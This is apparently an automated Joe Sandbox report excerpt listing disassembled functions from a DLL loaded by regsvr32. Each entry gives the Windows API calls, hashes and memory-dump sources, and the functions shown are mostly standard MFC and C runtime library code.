                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseEnumH_prolog3_OpenQueryValue
                                                                                                          • String ID: Software\
                                                                                                          • API String ID: 1666054129-964853688
                                                                                                          • Opcode ID: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
                                                                                                          • Instruction ID: 3764a028f082780bf1b34d3e1a3aecc110f1b9c57831791e493d608046546682
                                                                                                          • Opcode Fuzzy Hash: 3dcc581e61560c1b2a89a559af4b2aadf043690cbf44cd43855230fa8fe55520
                                                                                                          • Instruction Fuzzy Hash: 3C41AC35800128EBCB22DBA0CC81AEEB3B8FF49310F5045D9F249E2191DB34AB958F94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100222E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 100222EA
                                                                                                          • RegOpenKeyA.ADVAPI32(?,?,?), ref: 10022378
                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1002239B
                                                                                                            • Part of subcall function 1002228B: __EH_prolog3.LIBCMT ref: 10022292
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnumH_prolog3H_prolog3_catch_Open
                                                                                                          • String ID: Software\Classes\
                                                                                                          • API String ID: 3518408925-1121929649
                                                                                                          • Opcode ID: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
                                                                                                          • Instruction ID: 704202dc6e21b2fa8b48efa6eea704b7fc6a1643c8ca87a9ade3220d51c06aab
                                                                                                          • Opcode Fuzzy Hash: 148a9a07ce493e8523daa3725bf67091589f603dbf0392a59fe7285a5da600ad
                                                                                                          • Instruction Fuzzy Hash: A1317C36C00068EBDB22EBA4CD44BDDB6B8FB09350F5141D5F999A3252DA306FA49F91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002B26C, Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCapture.USER32 ref: 1002B279
                                                                                                          • SendMessageA.USER32 ref: 1002B294
                                                                                                          • GetFocus.USER32 ref: 1002B2A9
                                                                                                          • SendMessageA.USER32 ref: 1002B2B7
                                                                                                          • GetLastActivePopup.USER32(?), ref: 1002B2E0
                                                                                                          • SendMessageA.USER32 ref: 1002B2ED
                                                                                                            • Part of subcall function 1002881E: GetWindowLongA.USER32 ref: 10028844
                                                                                                            • Part of subcall function 1002881E: GetParent.USER32(?), ref: 10028852
                                                                                                          • SendMessageA.USER32 ref: 1002B313
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$ActiveCaptureFocusLastLongParentPopupWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3338174999-0
                                                                                                          • Opcode ID: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
                                                                                                          • Instruction ID: 3a08670cfc868389e080b955865bcb0f045f405a5b874c30a2897e43bb08e3ed
                                                                                                          • Opcode Fuzzy Hash: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
                                                                                                          • Instruction Fuzzy Hash: 7F1146B590065AFFEB11DFA1DD8AC9E7E7CEF41788B910075F504A2121EB719F04AB20
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002AAF8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 1002AB28
                                                                                                          • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB4B
                                                                                                          • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB67
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 1002AB77
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 1002AB81
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreate$Open
                                                                                                          • String ID: software
                                                                                                          • API String ID: 1740278721-2010147023
                                                                                                          • Opcode ID: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
                                                                                                          • Instruction ID: fb36ca9c2f952ecb3db15ddf6cda8d32fba402c4719dfc4725c3bd37d29a496b
                                                                                                          • Opcode Fuzzy Hash: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
                                                                                                          • Instruction Fuzzy Hash: 6B11E672900158FBDB11DB9ADD88CDFBFBDEB8A750B5000AAF504A2122D7319E44DBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002B00C, Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 1002B013
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 1002B01D
                                                                                                            • Part of subcall function 100312CD: RaiseException.KERNEL32(?,?,1004B6B4,1004F1B8,?,?,?,100203CA,1004B6B4,1004F1B8,00000000,00000000), ref: 1003130F
                                                                                                          • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002B034
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B041
                                                                                                            • Part of subcall function 10023B23: __CxxThrowException@8.LIBCMT ref: 10023B39
                                                                                                          • _memset.LIBCMT ref: 1002B060
                                                                                                          • TlsSetValue.KERNEL32(?,00000000), ref: 1002B071
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B092
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 356813703-0
                                                                                                          • Opcode ID: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
                                                                                                          • Instruction ID: 36d3102e2cb30bc4552268f57227952f3745dc8c02fd82b3b9104c669509b869
                                                                                                          • Opcode Fuzzy Hash: 57ffba166e203e5f771fa8df9200c34d4f09cabdb1cbb7fcc74f3b72e3f2cbe0
                                                                                                          • Instruction Fuzzy Hash: DC115E74100605AFD725EF64DCC5D2BBBB9FF453107A0C529F969D6522CB30AC24CB94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002A948, Relevance: 10.5, APIs: 7, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(0000000F), ref: 1002A956
                                                                                                          • GetSysColor.USER32(00000010), ref: 1002A95D
                                                                                                          • GetSysColor.USER32(00000014), ref: 1002A964
                                                                                                          • GetSysColor.USER32(00000012), ref: 1002A96B
                                                                                                          • GetSysColor.USER32(00000006), ref: 1002A972
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 1002A97F
                                                                                                          • GetSysColorBrush.USER32(00000006), ref: 1002A986
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Brush
                                                                                                          • String ID:
                                                                                                          • API String ID: 2798902688-0
                                                                                                          • Opcode ID: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
                                                                                                          • Instruction ID: 2de359d209fd3f7b37bcce9053ec3ec9da3e309d31870537ed148616a4e248d0
                                                                                                          • Opcode Fuzzy Hash: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
                                                                                                          • Instruction Fuzzy Hash: 0BF0FE719407445BD730BF724E49B47BAD1FFC4710F02092EE2458B990D6B6E441DF44
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10023266, Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 1002326D
                                                                                                          • GlobalLock.KERNEL32 ref: 10023345
                                                                                                          • CreateDialogIndirectParamA.USER32(?,?,?,10022CA4,00000000), ref: 10023374
                                                                                                          • DestroyWindow.USER32(00000000,?,1000150C,00000000,E5334AD4), ref: 100233EE
                                                                                                          • GlobalUnlock.KERNEL32(?,?,1000150C,00000000,E5334AD4), ref: 100233FE
                                                                                                          • GlobalFree.KERNEL32 ref: 10023407
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3003189058-0
                                                                                                          • Opcode ID: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
                                                                                                          • Instruction ID: 542586d5134ef99c8f61472b69a72313b72e87743f096b2e8f632b75dff3f323
                                                                                                          • Opcode Fuzzy Hash: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
                                                                                                          • Instruction Fuzzy Hash: DD519B31A0024AEFCB04DFA4E9859AEBBB5EF04350F95442DF506E7292CB70AA45CB61
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10037738, Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __CreateFrameInfo.LIBCMT ref: 10037760
                                                                                                            • Part of subcall function 10030430: __getptd.LIBCMT ref: 1003043E
                                                                                                            • Part of subcall function 10030430: __getptd.LIBCMT ref: 1003044C
                                                                                                          • __getptd.LIBCMT ref: 1003776A
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 10037778
                                                                                                          • __getptd.LIBCMT ref: 10037786
                                                                                                          • __getptd.LIBCMT ref: 10037791
                                                                                                          • _CallCatchBlock2.LIBCMT ref: 100377B7
                                                                                                            • Part of subcall function 100304D5: __CallSettingFrame@12.LIBCMT ref: 10030521
                                                                                                            • Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003786D
                                                                                                            • Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003787B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 1602911419-0
                                                                                                          • Opcode ID: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
                                                                                                          • Instruction ID: fb1f34f9027f5a0fd6fb665b034cbc12c1ee6665b85233a2d450c333db5c1a8f
                                                                                                          • Opcode Fuzzy Hash: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
                                                                                                          • Instruction Fuzzy Hash: 4F1104B9C04249EFDB01DFA4D945AEE7BB1FF08315F508469F814AB251DB38AA11DF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002A8D2, Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1315500227-0
                                                                                                          • Opcode ID: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
                                                                                                          • Instruction ID: abcb09268cf445b2c35b0e2b56c0cfd5e9caec1888beec0722017402bcd9ce52
                                                                                                          • Opcode Fuzzy Hash: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
                                                                                                          • Instruction Fuzzy Hash: FC018F32500126BBEB219F559D48EAF3BACFF463A1F414165FD15D6060DB30DA829A98
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10020982, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetMenuCheckMarkDimensions.USER32 ref: 1002099A
                                                                                                          • _memset.LIBCMT ref: 10020A12
                                                                                                          • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 10020A75
                                                                                                          • LoadBitmapA.USER32 ref: 10020A8D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 4271682439-3916222277
                                                                                                          • Opcode ID: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
                                                                                                          • Instruction ID: 8ec26202c106691d72478eed222520a6e30d1cb825b7d1c94e22465ec1c68f9d
                                                                                                          • Opcode Fuzzy Hash: 33d2bf27483d04382989d274a53bbefd1c41525da4d7f4bc6e43fef10d3baaa5
                                                                                                          • Instruction Fuzzy Hash: BD312772A003669FFB10CF289CC5B9D7BB5FB44340F9540AAF549EB182DA709E848B50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10025110, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10025150
                                                                                                          • GetSystemMetrics.USER32 ref: 10025168
                                                                                                          • GetSystemMetrics.USER32 ref: 1002516F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: System$Metrics$InfoParameters
                                                                                                          • String ID: B$DISPLAY
                                                                                                          • API String ID: 3136151823-3316187204
                                                                                                          • Opcode ID: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
                                                                                                          • Instruction ID: b60a64a5d5410e3ad8fe5a59109b18ab5d44eebb328e5d1eff8611f1e2dd37b9
                                                                                                          • Opcode Fuzzy Hash: b6b25803d1236a503b5fcdcee7e41ccf2bd8b680c30ee70901717e7f43f6efc3
                                                                                                          • Instruction Fuzzy Hash: 4511E771901334AFEB52DF64DC85B9B7BA8EF45791F414061FD0AAE006D672D910CBE4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10037474, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 1003748E
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 1003749F
                                                                                                          • __getptd.LIBCMT ref: 100374AD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                          • String ID: MOC$csm
                                                                                                          • API String ID: 803148776-1389381023
                                                                                                          • Opcode ID: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
                                                                                                          • Instruction ID: 4aa484bfd58dbd3435781d5c114dead901570b21edfee72e4775129354a6ca63
                                                                                                          • Opcode Fuzzy Hash: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
                                                                                                          • Instruction Fuzzy Hash: 59E012395142448FC322DA64D046B283AE4FB4A216F5A04A1E54C8F223CB38F8809692
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002A742, Relevance: 7.6, APIs: 5, Instructions: 54stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 1002A76E
                                                                                                          • _memset.LIBCMT ref: 1002A78B
                                                                                                          • GetWindowTextA.USER32 ref: 1002A7A5
                                                                                                          • lstrcmpA.KERNEL32(00000000,?), ref: 1002A7B7
                                                                                                          • SetWindowTextA.USER32(?,?), ref: 1002A7C3
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 289641511-0
                                                                                                          • Opcode ID: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
                                                                                                          • Instruction ID: 26b6340e82542b1e4468bed3117474a07e50960d7f5f1af9f26f2e201bf88dc7
                                                                                                          • Opcode Fuzzy Hash: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
                                                                                                          • Instruction Fuzzy Hash: 6201C4B6600224ABEB11DB64AEC4BDA77BCEB56750F410062FA05D3141DA709E8487A4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1003303D, Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 10033049
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __amsg_exit.LIBCMT ref: 10033069
                                                                                                          • __lock.LIBCMT ref: 10033079
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 10033096
                                                                                                          • InterlockedIncrement.KERNEL32(04441600), ref: 100330C1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
